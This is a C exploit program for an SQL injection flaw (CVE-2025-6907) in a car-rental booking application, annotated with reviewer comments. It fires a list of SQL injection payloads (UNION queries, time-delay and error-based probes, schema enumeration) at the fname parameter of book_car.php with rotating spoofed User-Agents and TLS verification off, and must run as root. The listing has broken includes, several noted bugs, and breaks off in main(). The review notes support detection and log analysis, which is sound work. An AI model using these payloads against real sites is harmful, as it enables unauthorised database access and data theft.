//CVE : cve-2025-6907
//File Name : exploit.c
//Author : Byte Reaper
//Target Service : CODE_PROJECT
//Type : Sql Injection
//---------------------------------------------------------------------------------------------------
/*
 * Review overview (reading aid; the code below is unchanged).
 *
 * What the program does, as far as this file shows:
 *   - refuses to run unless the effective UID is 0 and the build is Linux;
 *   - with -c, inspects /var/www/html on the LOCAL machine for folder and
 *     file names of the target application and checks for an Apache process;
 *   - with -u / -i, sends a fixed list of SQL test strings to the `fname`
 *     parameter of book_car.php (or to a caller-supplied full URL) and
 *     reports "vulnerable" when the response is slow or contains one of a
 *     list of database error strings.
 *
 * Points a defender or triager should keep in mind:
 *   - the "vulnerable" verdicts are heuristics (see the notes in e());
 *     the tool's output alone is not proof of exploitation;
 *   - the requests have a stable shape (fixed header set, rotating list of
 *     dated User-Agent strings, URL-encoded SQL metacharacters in `fname`),
 *     which is usable for log review and WAF/IDS rules;
 *   - the standard remedies for this bug class apply on the server side:
 *     parameterised queries and no database error text in responses.
 *
 * NOTE(review): the header names after the bare `#include` directives below
 * were lost when this page was extracted, so the listing does not compile as
 * shown.
 */
#include
#include
#include
#include
#include "argparse.h"
#include
#include
#include
#include

#define FULL_URL 4500          /* size of the request-URL buffer in e() */
#define USE_URL 4096           /* not referenced anywhere in this file */
#define BUF_CHECK_FOLDER 1096  /* size of the directory-entry buffers */

/* Global switches; set from the command line in main(). */
int showResponse = 0;   /* print response bodies */
int useFullurl = 0;     /* treat the URL as complete, do not append the path */
int apacheRunning = 0;  /* set by checkProccess() */
int verbose = 0;        /* extra diagnostics, libcurl verbose output */
const char *inputUrl = NULL;

/*
 * Compile-time platform gate. The branch is selected by the preprocessor,
 * not at run time: every branch except __linux__ prints an error and calls
 * exit(1); the __linux__ branch only prints a start-up message.
 */
void checkSystem()
{
#ifdef _WIN32
    printf("\e[1;31m[-] Error Run Exploit !\n");
    printf("\e[1;31m[-] Your Os : Windows 32 bit / 64 bit !\n");
    printf("\e[1;31m[-] Please Change Your System on Linux !\n");
    exit(1);
#elif TARGET_OS_MAC
    printf("\e[1;31m[-] Error Run Exploit !\n");
    printf("\e[1;31m[-] Your Os : MacOS !\n");
    printf("\e[1;31m[-] Please Change Your System on Linux !\n");
    exit(1);
#elif __linux__
    printf("\e[1;36m[+] Exploit started successfully...\n");
    printf("\e[1;36m[+] Your Os : Linux !\n");
#else
    printf("\e[1;31m[-] Error Run Exploit !\n");
    printf("\e[1;31m[-] Your Os : Unknow Os !\n");
    printf("\e[1;31m[-] Please Change Your System on Linux !\n");
    exit(1);
#endif
}

/* Growable buffer that accumulates one HTTP response body. */
struct Mem {
    char *buffer;  /* heap storage, NUL-terminated after every append */
    size_t len;    /* bytes stored, not counting the terminator */
};

/*
 * libcurl write callback: appends `size * nmemb` bytes from `ptr` to the
 * struct Mem passed as `userdata`.
 *
 * Returns the number of bytes consumed, or 0 when realloc fails (the old
 * buffer is left in place in that case).
 *
 * NOTE(review): `size * nmemb` and `m->len + total + 1` are not checked for
 * overflow, and there is no upper bound on how large the buffer may grow, so
 * the peer decides how much memory this process allocates.
 */
size_t write_cb(void *ptr, size_t size, size_t nmemb, void *userdata)
{
    size_t total = size * nmemb;
    struct Mem *m = (struct Mem *)userdata;
    char *tmp = realloc(m->buffer, m->len + total + 1);
    if (!tmp) return 0;
    m->buffer = tmp;
    memcpy(&(m->buffer[m->len]), ptr, total);
    m->len += total;
    m->buffer[m->len] = '\0';
    return total;
}

/*
 * Substrings searched for (case-sensitively, via strstr) in a 2xx response
 * body. A single hit makes e() report the target as vulnerable.
 *
 * NOTE(review): several entries ("Fatal error", "Unhandled Exception",
 * "Database error", "SQL error") are generic and can appear on pages that
 * have nothing to do with the injected parameter, so a match is an
 * indicator, not a confirmation. Conversely, a server that does not echo
 * database errors produces no match here at all.
 */
const char *sql_response_signatures[] = {
    "syntax error",
    "Warning: mysql_fetch_assoc()",
    "Warning: mysqli_query()",
    "SQLSTATE",
    "Invalid query",
    "Unclosed quotation mark",
    "quoted string not properly terminated",
    "You have an error in your SQL syntax",
    "Warning: pg_query()",
    "Warning: pg_send_query()",
    "pg_query(): Query failed",
    "Microsoft OLE DB Provider for SQL Server",
    "Incorrect syntax near",
    "Unclosed quotation mark after the character string",
    "SQL error",
    "mysql_num_rows() expects parameter",
    "mysql_fetch_array() expects parameter",
    "Fatal error",
    "mysql_fetch_object() expects parameter",
    "mysqli_fetch_assoc() expects parameter",
    "mysql_fetch_row() expects parameter",
    "supplied argument is not a valid MySQL",
    "Warning: mssql_query()",
    "syntax error at or near",
    "org.hibernate.exception",
    "unexpected end of SQL command",
    "SQL query failed",
    "database query error",
    "DB2 SQL error",
    "OLE DB provider returned message",
    "JDBC SQL error",
    "pg_fetch_array() expects parameter",
    "pg_fetch_assoc() expects parameter",
    "Query execution failed",
    "Database error",
    "Unhandled Exception",
    "ORA-00933: SQL command not properly ended",
    "ORA-01756: quoted string not properly terminated",
    "SQL Server Error",
    "mysql_numrows() expects parameter",
    "mysql_num_fields() expects parameter",
    "Syntax error or access violation",
    "SQL syntax error",
    "NativeError",
    "ODBC SQL Server Driver",
    "Warning: odbc_exec()",
    "Warning: odbc_prepare()",
    "Fatal error: Call to a member function",
};

/*
 * User-Agent values cycled through by agent(). For log review: the set is
 * fixed and consists of dated browser strings, and consecutive requests
 * from one run step through it in this order.
 */
const char *a[] = {
    "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 AOL/9.7 AOLBuild/4343.4043.US Safari/537.36",
    "Mozilla/5.0 (Linux; Android 4.4.2; SM-P600 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36",
    "Mozilla/5.0 (X11; Linux x86_64; rv:39.0) Gecko/20100101 Firefox/39.0",
    "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.99 Safari/537.36",
    "Mozilla/5.0 (Windows NT 6.1; rv:35.0) Gecko/20100101 Firefox/35.0",
    "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25",
    "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.22 Safari/537.36",
    "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; 360SE)",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36",
    "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; Touch; LCJB; rv:11.0) like Gecko",
    "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36",
    "Mozilla/5.0 (X11; CrOS x86_64 6812.88.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.153 Safari/537.36",
    "Mozilla/5.0 (X11; Linux i686; rv:38.0) Gecko/20100101 Firefox/38.0"
};

/*
 * Sets the next User-Agent from a[] on `curl`, round-robin. The position is
 * kept in a function-local static, so it persists across calls.
 */
void agent(CURL *curl)
{
    static int c = 0;
    static int nma = sizeof(a) / sizeof(a[0]);
    const char *us = a[c];
    c = (c + 1) % nma;
    curl_easy_setopt(curl, CURLOPT_USERAGENT, us);
}

/*
 * Test strings placed (URL-encoded) into the request by e(). The list mixes
 * boolean, UNION, error-message and time-delay forms. For log review, these
 * literals in percent-encoded form are what appears in the query string.
 */
const char *payloadSql[] = {
    "' OR '1'='1' --+",
    "' UNION SELECT NULL,NULL,NULL --+",
    "' UNION SELECT NULL,@@version,NULL --+",
    "' UNION SELECT NULL,database(),user() --+",
    "'/**/UNION/**/SELECT/**/NULL,version(),NULL--+",
    "' OR IF(1=1, SLEEP(5), 0)--+",
    "' OR IF(ASCII(SUBSTRING((SELECT database()),1,1)) > 64, SLEEP(5), 0)--+",
    "\" UNION SELECT NULL,@@version,NULL --+",
    "' AND updatexml(1,concat(0x7e,(SELECT user()),0x7e),1) --+",
    "' OR IF(1=1, SLEEP(3), 0) --+",
    "'; SELECT user(); --+",
    "' UNION SELECT 1,2,0x6461746162617365 --+",
    "' UNION SELECT table_name,column_name,NULL FROM information_schema.columns WHERE table_schema=database() --+"
};

/* Number of entries in sql_response_signatures. */
int numberKey = sizeof(sql_response_signatures) / sizeof(sql_response_signatures[0]);

/*
 * Sends every entry of payloadSql to the target and classifies the result.
 *
 * baseUrl: with useFullurl set, the encoded string is appended directly to
 *          it; otherwise "/book_car.php?fname=" is inserted in between.
 *
 * Per request the function measures wall-clock time and reads the status
 * code. It stops at the first "hit": a request that took more than 4000 ms,
 * or a 2xx body containing one of sql_response_signatures.
 *
 * Review notes on the verdict logic (all visible below):
 *   - the timing check applies to every payload, including those that
 *     request no delay, and it runs BEFORE the transfer result `r` is
 *     examined, so a slow or timed-out request is reported as a time-based
 *     finding;
 *   - after that `break`, control reaches the "All payloads tested. No SQLi
 *     signature detected." message, so both verdicts are printed;
 *   - TLS peer and host verification are switched off, so the identity of
 *     the responding server is not checked.
 */
void e(const char *baseUrl)
{
    char full[FULL_URL];
    CURL *curl = curl_easy_init();
    struct Mem chunk = { NULL, 0 };
    long ht = 0;
    if (!curl) {
        printf("\e[1;31m[-] Error Create Object Curl.\n");
        printf("\e[1;31m[-] Please Check Your Connection, (Ex command : ip show)\n");
        printf("\e[1;33m[-] Run Command ip show ...\n");
        const char *command = "ip show";
        const char *argv[] = { NULL, command };
        const char *envp[] = { NULL };
        /*
         * Raw x86-64 Linux syscalls: 59 (execve) followed by 60 (exit) with
         * status 0. Either the process image is replaced or the process
         * exits here, so the `goto exit` below is not reached and libc exit
         * handlers do not run.
         */
        __asm__ volatile (
            "mov $59, %%rax\n\t"
            "mov %[command], %%rdi\n\t"
            "mov %[argv], %%rsi\n\t"
            "mov %[envp], %%rdx\n\t"
            "syscall\n\t"
            "mov $60, %%rax\n\t"
            "xor %%rdi, %%rdi\n\t"
            "syscall\n\t"
            :
            :[command] "r" (command), [argv] "r" (argv), [envp] "r" (envp)
            :"rax", "rdi", "rsi", "rdx"
        );
        goto exit;
    }
    curl_easy_setopt(curl, CURLOPT_ACCEPT_ENCODING, "");
    curl_easy_setopt(curl, CURLOPT_FOLLOWLOCATION, 1L);
    curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, write_cb);
    curl_easy_setopt(curl, CURLOPT_WRITEDATA, &chunk);
    curl_easy_setopt(curl, CURLOPT_CONNECTTIMEOUT, 5L);
    curl_easy_setopt(curl, CURLOPT_TIMEOUT, 10L);
    /* Certificate and hostname checks disabled for every request. */
    curl_easy_setopt(curl, CURLOPT_SSL_VERIFYPEER, 0L);
    curl_easy_setopt(curl, CURLOPT_SSL_VERIFYHOST, 0L);
    if (verbose) {
        curl_easy_setopt(curl, CURLOPT_VERBOSE, 1L);
    }
    int numberPayload = sizeof(payloadSql) / sizeof(payloadSql[0]);
    for (int p = 0; p < numberPayload; ++p) {
        const char *payload = payloadSql[p];
        /* Only used for the verbose address/length print below. */
        size_t lenPayload = strlen(payload) - 1;
        char *esc = curl_easy_escape(curl, payload, 0);
        if (!esc) {
            fprintf(stderr, "\e[1;31m[-] URL-encoding failed for payload\n");
            continue;
        }
        /* NOTE(review): snprintf truncation is not detected; an over-long
         * baseUrl yields a silently shortened request URL. */
        if (useFullurl) {
            snprintf(full, sizeof(full), "%s%s", baseUrl, esc);
        } else {
            snprintf(full, sizeof(full), "%s/book_car.php?fname=%s", baseUrl, esc);
        }
        if (verbose) {
            printf("\e[1;35m[payload] [%02d] %p-%p %08zx \e[0m\n", p, (void*)payload, (void*)(payload + lenPayload), lenPayload);
        }
        curl_free(esc);
        /*
         * Header list rebuilt for every request. The set is constant
         * (including the fixed Referer), which makes it a usable fingerprint
         * in server logs.
         * NOTE(review): the list is freed only at the bottom of the loop
         * body; the `break` and `goto exit` paths below leave without
         * freeing it.
         */
        struct curl_slist *h = NULL;
        h = curl_slist_append(h, "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8");
        h = curl_slist_append(h, "Accept-Encoding: gzip, deflate, br");
        h = curl_slist_append(h, "Accept-Language: en-US,en;q=0.5");
        h = curl_slist_append(h, "Connection: keep-alive");
        h = curl_slist_append(h, "Referer: http://example.com/");
        h = curl_slist_append(h, "Cache-Control: no-cache");
        h = curl_slist_append(h, "Pragma: no-cache");
        curl_easy_setopt(curl, CURLOPT_HTTPHEADER, h);
        /* Drop the previous response so each body is inspected on its own. */
        if (chunk.buffer) {
            free(chunk.buffer);
            chunk.buffer = NULL;
        }
        chunk.len = 0;
        printf("\e[1;34m[+] Full Format Url : %s", full);
        curl_easy_setopt(curl, CURLOPT_URL, full);
        agent(curl);
        struct timeval start, end;
        gettimeofday(&start, NULL);
        CURLcode r = curl_easy_perform(curl);
        gettimeofday(&end, NULL);
        /* Elapsed wall-clock time of the whole transfer, in milliseconds. */
        long elapsed = (end.tv_sec - start.tv_sec) * 1000 + (end.tv_usec - start.tv_usec) / 1000;
        curl_easy_getinfo(curl, CURLINFO_RESPONSE_CODE, &ht);
        if (elapsed > 4000) {
            printf("\e[1;32m[+] Check Time-Based Blind SQLi on Target...\n");
            /* NOTE(review): this call has a %ld conversion but no argument
             * (undefined behaviour); the next call passes `elapsed` to a
             * format string that has no conversion. The argument appears to
             * be on the wrong line. */
            printf("\e[1;32m[+] Time-Delay Detected (%ld ms)\n");
            printf("\e[1;32m[+] Target likely VULNERABLE to Time-Based Blind SQLi!\n", elapsed);
            break;
        }
        if (r != CURLE_OK) {
            printf("\e[1;33m[!] Please Check Your Connection on Server !\n");
            printf("\e[1;33m[!] Exemple Command Check Access Connection : ping google.com\n");
            printf("\e[1;34m[*] Run Command For Check Your Connection : ping -c 5 8.8.8.8");
            const char *command = "/bin/ping";
            char *const argv[] = {"ping", "-c", "2", "8.8.8.8", NULL};
            const char *envp[] = {NULL};
            /*
             * Raw execve (59) of /bin/ping followed by exit (60). On success
             * the process is replaced by ping; on failure it exits with
             * status 0. In both cases the fprintf below and the remaining
             * payloads are never reached.
             */
            __asm__ volatile (
                "mov $59, %%rax\n\t"
                "mov %[command], %%rdi\n\t"
                "mov %[argv], %%rsi\n\t"
                "mov %[envp], %%rdx\n\t"
                "syscall\n\t"
                "mov $60, %%rax\n\t"
                "xor %%rdi, %%rdi\n\t"
                "syscall\n\t"
                :
                :[command] "r" (command), [argv] "r" (argv), [envp] "r" (envp)
                :"rax", "rdi", "rsi", "rdx"
            );
            fprintf(stderr, "\e[1;31m[-] curl error: %s\n", curl_easy_strerror(r));
        } else {
            printf("\e[1;34m\n[+] Request Send Success !\n");
            printf("\e[1;32m[+] HTTP CODE : %ld\n", ht);
            if (ht >= 200 && ht < 300) {
                printf("\e[1;34m[+] The payload was successfully responded to by the server !\n");
                int found = 0;
                /* NOTE(review): chunk.buffer is still NULL when the response
                 * had no body (write_cb was never called); strstr and the
                 * "%s" prints below are then given a null pointer. */
                for (int k = 0; k < numberKey; ++k) {
                    if (strstr(chunk.buffer, sql_response_signatures[k])) {
                        printf("\e[1;34m[+] A suspicious word was found: %s\n", sql_response_signatures[k]);
                        printf("\e[1;34m[+] The server is vulnerable to CVE‑2025‑6907 !\n");
                        found = 1;
                        break;
                    }
                }
                if (!found) {
                    printf("\e[1;31m[-] No suspicious patterns found in response for this payload.\n");
                    if (showResponse) {
                        printf("\e[1;33m-------------------------------- Response Server --------------------------------\n");
                        printf("%s\n", chunk.buffer);
                        printf("\e[1;33m-----------------------------------------------------------------------------------\n");
                    }
                    printf("\e[0;36m[*] Trying next payload...\n\n");
                    printf("\e[1;37m---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\n");
                } else {
                    if (showResponse) {
                        /* NOTE(review): chunk.buffer is passed here although
                         * the format string has no conversion for it. */
                        printf("\e[1;33m-------------------------------- Response Server --------------------------------\n", chunk.buffer);
                        printf("%s", chunk.buffer);
                        printf("\e[1;33m-----------------------------------------------------------------------------------\n");
                    }
                    /* First signature match ends the run. */
                    goto exit;
                }
            } else {
                printf("\e[1;31m[-] Unexpected HTTP code %ld for this payload, trying next...\n\n", ht);
            }
        }
        curl_slist_free_all(h);
        h = NULL;
    }
    printf("\e[1;31m[-] All payloads tested. No SQLi signature detected.\n");
exit:
    if (chunk.buffer) {
        free(chunk.buffer);
    }
    if (curl) {
        curl_easy_cleanup(curl);
    }
}

/* Set by the -c / --check option: run the local environment checks. */
int runS = 0;

/*
 * Looks inside `folderPath` (on the local machine) for file names that
 * belong to the target application and prints what it finds.
 *
 * Returns 0 after printing, or -1 if the directory cannot be opened or read.
 *
 * NOTE(review): directory entries are fetched with ONE raw syscall 217
 * (getdents64 on x86-64) into a BUF_CHECK_FOLDER-byte buffer, so only the
 * first batch of entries is examined; names beyond it are reported as
 * missing.
 */
int checkFilesInFolder(const char *folderPath)
{
    int fd = open(folderPath, O_RDONLY | O_DIRECTORY);
    if (fd < 0) {
        perror("[-] Error open folder");
        return -1;
    }
    char buffer[BUF_CHECK_FOLDER];
    int nread = syscall(217, fd, buffer, BUF_CHECK_FOLDER);
    if (nread <= 0) {
        printf("\e[1;31m[-] Error reading folder content: %s\n", folderPath);
        close(fd);
        return -1;
    }
    /* Local declaration of the record layout the kernel writes into buffer. */
    struct linux_dirent64 {
        unsigned long long d_ino;
        long long d_off;
        unsigned short d_reclen;
        unsigned char d_type;
        char d_name[];
    };
    /* Names looked for; "my-booking.php" is listed twice. */
    const char *filesToCheck[] = {
        "book_car.php",
        "my-booking.php",
        "booking.php",
        "include",
        "admin",
        "assets",
        "car-listing.php",
        "check_availability.php",
        "contact-us.php",
        "index.php",
        "logout.php",
        "my-booking.php",
        "my-testimonials.php",
        "page.php",
        "post-testimonial.php",
        "profile.php",
        "search-carresult.php",
        "update-password.php",
        "vehical-details.php"
    };
    const int numberFiles = sizeof(filesToCheck) / sizeof(filesToCheck[0]);
    int foundFiles[numberFiles];
    memset(foundFiles, 0, sizeof(foundFiles));
    /* Walk the variable-length records; d_reclen gives the step. */
    int bpos = 0;
    while (bpos < nread) {
        struct linux_dirent64 *d = (struct linux_dirent64 *)(buffer + bpos);
        for (int i = 0; i < numberFiles; i++) {
            if (strcmp(d->d_name, filesToCheck[i]) == 0) {
                foundFiles[i] = 1;
            }
        }
        bpos += d->d_reclen;
    }
    close(fd);
    int showAn = 0;
    printf("\e[1;35m\n[+] Step 2 : Check the files inside the folder...\n");
    printf("\e[1;37m-----------------------------------------------------------------------------------------------\n");
    for (int i = 0; i < numberFiles; i++) {
        if (foundFiles[i]) {
            if (!showAn) {
                printf("\e[1;34m[+] Analysis File Code-PROJECTS...\n");
                showAn = 1;
            }
            printf("\e[1;34m[+] Found file code-projects Car : %s/%s\n", folderPath, filesToCheck[i]);
            /* NOTE(review): finding ANY ONE of these three names prints the
             * summary that says all confirming files are present, and ends
             * the listing. */
            if (strcmp(filesToCheck[i], "my-booking.php") == 0||
                strcmp(filesToCheck[i], "car-listing.php") == 0||
                strcmp(filesToCheck[i], "page.php") == 0) {
                printf("\e[1;33m-----------------------------------Result Check File-----------------------------------\n");
                printf("\e[1;34m[+] File my-booking.php : The file that causes the SQL vulnerability\n");
                printf("\e[1;34m[+] File page.php : Service display page\n");
                printf("\e[1;34m[+] File car-listing.php : Car information file\n");
                printf("\e[1;34m[+] All files that confirm the service are present !!\n");
                printf("\e[1;33m----------------------------------------------------------------------------------------\n");
                break;
            }
        } else {
            if (verbose) {
                /* NOTE(review): "\%" is not a standard C escape sequence;
                 * "%s/%s" was presumably intended. */
                printf("[-] File not Found : %s\%s\n",folderPath, filesToCheck[i]);
            }
            continue;
        }
        fflush(stdout);
    }
    return 0;
}

/*
 * Scans /var/www/html on the local machine for sub-folders whose names
 * match a fixed list, and runs checkFilesInFolder() on each match.
 *
 * Returns 0 after the scan, or -1 when the directory content cannot be read.
 *
 * The open and the directory read are issued as raw x86-64 syscalls from
 * inline assembly (1 = write, 2 = open, 217 = getdents64).
 */
int checkFile()
{
    /* `exp` is not used anywhere in this function. */
    const char *exp = "\e[1;35m[+] Service search argument is enabled on your system";
    char buffer[BUF_CHECK_FOLDER];
    const char *step1 = "\e[1;33m[+] An attempt to search within the /var/www/html directory has been initiated...\n";
    printf("\e[1;35m[+] Step 1 : Check Folder Service ...\n");
    /* Length minus one: the trailing newline of step1 is not written. */
    size_t step1Len = strlen(step1) - 1;
    const char *path = "/var/www/html";
    const char *errorMessage = "\e[1;31m[-] Error Check Path /var/www/html !\n";
    size_t lenError = strlen(errorMessage);
    int fd;
    /*
     * write(1, step1, step1Len); then open(path, 0, 0). On success the
     * returned descriptor is copied into `fd`.
     * NOTE(review): on the failure path the code writes the error message
     * and loads -1 into eax, but never stores to the output operand, so
     * `fd` appears to be left indeterminate before it is used below.
     * NOTE(review): printf above goes through stdio while this write is
     * unbuffered, so the two messages may appear out of order.
     */
    __asm__ volatile (
        "mov $1, %%rax\n\t"
        "mov $1, %%rdi\n\t"
        "mov %[step1], %%rsi\n\t"
        "mov %[step1Len], %%rdx\n\t"
        "syscall\n\t"
        "mov $2, %%rax\n\t"
        "mov %[pth], %%rdi\n\t"
        "mov $0, %%rsi\n\t"
        "mov $0, %%rdx\n\t"
        "syscall\n\t"
        "cmp $0, %%rax\n\t"
        "jl 1f\n\t"
        "mov %%eax, %0\n\t"
        "jmp 2f\n"
        "1:\n\t"
        "mov $1, %%rax\n\t"
        "mov $1, %%rdi\n\t"
        "mov %[err_msg], %%rsi\n\t"
        "mov %[err_len], %%rdx\n\t"
        "syscall\n\t"
        "mov $-1, %%eax\n\t"
        "2:\n\t"
        : "=r"(fd)
        : [step1] "r"(step1), [step1Len] "r"(step1Len), [pth] "r"(path), [err_msg] "r"(errorMessage), [err_len] "r"(lenError)
        : "rax","rdi","rsi","rdx","rcx","r11"
    );
    int32_t nread;
    /*
     * getdents64(fd, buffer, BUF_CHECK_FOLDER), issued once.
     * NOTE(review): there is no "memory" clobber although the kernel writes
     * into `buffer`; confirm the compiler cannot reorder around this.
     */
    __asm__ volatile (
        "mov $217, %%rax\n\t"
        "syscall\n\t"
        : "=a"(nread)
        : "D"(fd), "S"(buffer), "d"((unsigned long)BUF_CHECK_FOLDER)
        : "rcx", "r11"
    );
    if (nread <= 0) {
        const char *errorContent = "\e[1;31m[-] Error Check Content Folder !\n";
        size_t lenCheck = strlen(errorContent);
        write(1, errorContent, lenCheck);
        close(fd);
        return -1;
    }
    struct linux_dirent64 {
        unsigned long long d_ino;
        long long d_off;
        unsigned short d_reclen;
        unsigned char d_type;
        char d_name[];
    };
    /* Folder names treated as a possible install of the target application. */
    const char *nameFolder[] = {
        "care",
        "online_care",
        "online_care_rental",
        "rental_care",
        "online",
        "Care_online",
        "my_care",
        "car_rental",
        "rental_system",
        "car_booking",
        "book_car",
        "booking",
        "car_rentals",
        "car_rental_system",
        "rental",
        "car_service",
        "rental_service",
        "car_rental_app",
        "rental_app",
        "carrental",
        "onlinerental",
        "onlinerentalcar",
        "rentals",
        "carhire",
        "autocare",
        "carshare",
        "online_car_rental",
        "vehicles",
        "fleet",
        "fleet_management",
        "car_fleet",
        "my_rental",
        "online_rent",
        "auto_rent",
        "car_rental_project",
        "online_car_rental_service"
    };
    const int numberName = sizeof(nameFolder) / sizeof(nameFolder[0]);
    int foundName[numberName];
    memset(foundName, 0, sizeof(foundName));
    /* Same record walk as in checkFilesInFolder(); one batch only. */
    int bpos = 0;
    while (bpos < nread) {
        struct linux_dirent64 *d = (struct linux_dirent64 *)(buffer + bpos);
        for (int i = 0; i < numberName; i++) {
            if (strcmp(d->d_name, nameFolder[i]) == 0) {
                foundName[i] = 1;
            }
        }
        bpos += d->d_reclen;
    }
    close(fd);
    printf("\e[1;37m\n-----------------------------------------------------------------------------------------------\n");
    for (int i = 0; i < numberName; i++) {
        if (foundName[i]) {
            printf("\e[1;34m\n[+] Found folder: %s/%s\n", path, nameFolder[i]);
            fflush(stdout);
            char subfolderPath[512];
            snprintf(subfolderPath, sizeof(subfolderPath), "%s/%s", path, nameFolder[i]);
            checkFilesInFolder(subfolderPath);
        }
        //If you want to see the failed attempts
        else {
            if (verbose) {
                printf("\e[1;31m\n[-] Not found : %s/%s\n", path, nameFolder[i]);
                fflush(stdout);
            }
        }
    }
    return 0;
}

/*
 * Checks the local process list for Apache and sets apacheRunning when a
 * line contains "apache2" or "httpd".
 *
 * Side effect worth knowing before running this on any host: when Apache is
 * detected, the function invokes `systemctl start apache2.service` through
 * system(), i.e. it changes service state, as root (see runRoot()).
 *
 * NOTE(review): when popen() fails only a message is printed; the code then
 * still passes the NULL stream to fgets() and pclose().
 */
void checkProccess()
{
    FILE *file ;
    printf("\e[1;35m[+] Step 3 : Check apache Server on System ...\n");
    char buffer[1024];
    file = popen("ps aux | grep -i apache | grep -v grep", "r");
    if (file == NULL) {
        printf("\e[1;31m[-] Error Open Proccess !\n");
    }
    while (fgets(buffer, sizeof(buffer), file) != NULL) {
        if (strstr(buffer, "apache2") != NULL || strstr(buffer, "httpd") != NULL) {
            apacheRunning = 1;
            break;
        }
    }
    pclose(file);
    printf("\e[1;34m[+] Try to run Apache...\n");
    if (apacheRunning) {
        printf("\e[1;34m[+] Apache is running !\n");
        int check = system("systemctl start apache2.service ");
        if (check == 0) {
            printf("\e[1;34m[+] Server Apache Run Success !\n");
        } else {
            printf("\e[1;31m[-] Error Run Command systemctl start apache2.service !\n");
        }
    } else {
        printf("\e[1;31m[-] Apache is NOT running !\n");
    }
}

/*
 * Exits with status 1 unless the effective UID is 0.
 *
 * NOTE(review): main() calls this unconditionally, so the network-facing
 * code in e() (response parsing, unbounded buffering) also runs as root,
 * although nothing in e() visibly needs that privilege.
 */
void runRoot()
{
    if (geteuid() != 0) {
        printf("\e[1;31m[-] You need to run this as root !\n");
        printf("\e[1;31m[-] Exemple Command : sudo su\n");
        printf("\e[1;31m[-] And Run Exploit , Exit...\n");
        exit(1);
    }
}

/*
 * Prints this process's own memory map by copying /proc/self/maps to
 * stdout. Called from main() in verbose mode only.
 */
void memory(void)
{
    FILE *f = fopen("/proc/self/maps", "r");
    if (!f) {
        perror("[-] fopen(/proc/self/maps)");
        return;
    }
    printf("\n\e[1;35m========================================[Memory Map]========================================\e[0m\n");
    char line[256];
    while (fgets(line, sizeof(line), f)) {
        printf("%s", line);
    }
    printf("\e[1;35m=========================================================================================\e[0m\n\n");
    fclose(f);
}

/*
 * Prints the long help text for the command-line options.
 *
 * NOTE(review): the first heading line is printed twice, and the -v example
 * passes a URL that already ends in "book_car.php?fname=" to -u, which e()
 * extends with "/book_car.php?fname=" again.
 */
void showHelp()
{
    printf("\e[1;37m\n[+] Explanation of the arguments:\n");
    printf("\e[1;37m\n[+] Explanation of the arguments:\n");
    printf("\e[1;37m\t1- *-u / --url:\n");
    printf("\e[1;37m\t\tAn argument to pass the base URL pointing to a specific file named 'book_car.php' with a query parameter 'fname'.\n");
    printf("\e[1;37m\t\tThe tool appends your input directly to this URL, creating requests like: book_car.php?fname=YOUR_INPUT\n");
    printf("\e[1;37m\t\tThis is useful for targeted testing when the vulnerable parameter is 'fname' in 'book_car.php'.\n");
    printf("\e[1;37m\t\t[+] Example: ./exploit -u http://127.0.0.1\n\n");
    printf("\e[1;37m\t2- *-r / --response:\n");
    printf("\e[1;37m\t\tShow HTTP response bodies for each request.\n");
    printf("\e[1;37m\t\tHelps inspect server feedback and error messages.\n");
    printf("\e[1;37m\t\t[+] Example: ./exploit -u http://127.0.0.1 -r\n\n");
    printf("\e[1;37m\t3- *-i / --input:\n");
    printf("\e[1;37m\t\tTreat the provided URL as a full URI (including query).\n");
    printf("\e[1;37m\t\tUseful for custom endpoints or non-standard paths.\n");
    printf("\e[1;37m\t\t[+] Example: ./exploit -u \"http://127.0.0.1/file.php?fname=1' OR '1'='1\" -i\n\n");
    printf("\e[1;37m\t4- *-c / --check:\n");
    printf("\e[1;37m\t\tPerform service & environment checks (files, folders, Apache).\n");
    printf("\e[1;37m\t\tVerifies prerequisites before sending payloads.\n");
    printf("\e[1;37m\t\t[+] Example: ./exploit -c\n\n");
    printf("\e[1;37m\t5- *-v / --verbose:\n");
    printf("\e[1;37m\t\tEnable verbose mode (detailed curl operations & payload mapping).\n");
    printf("\e[1;37m\t\tPrints additional debug info such as payload addresses and curl logs.\n");
    printf("\e[1;37m\t\t[+] Example: ./exploit -u http://127.0.0.1/book_car.php?fname= -v\n\n");
    printf("\e[1;37m-----------------------------------------------------------------------------------------------------------------------------------------------------------\n");
}

/*
 * Entry point: prints the banner, enforces root and Linux, parses the
 * options and dispatches.
 *
 * Flow after parsing:
 *   - -h prints the help and then continues with the rest of the flow;
 *   - -c without a URL runs the local checks and returns;
 *   - no -c and no URL prints a usage hint and leaves through a raw exit
 *     syscall with status 0;
 *   - -c with a URL runs the local checks and then the remote test;
 *   - otherwise the remote test e(url) runs directly.
 * A URL given with -i takes precedence over one given with -u.
 */
int main(int argc, const char **argv)
{
    printf("\e[1;31m"
        "⠀⠀⠀⠀⠀⣶⡆⠀⠀⠀⢀⣴⢦⠀⠀⠀⠀⣖⡶⠀⠀⠀⠀⡏⡧⠀⠀⠀⠀⠀\n"
        "⠀⠀⠀⠀⠀⢹⣷⡀⠀⠀⢀⣿⣧⡀⠀⠀⢠⣾⣧⠀⠀⠀⣠⣾⡇⠀⠀⠀⠀⠀\n"
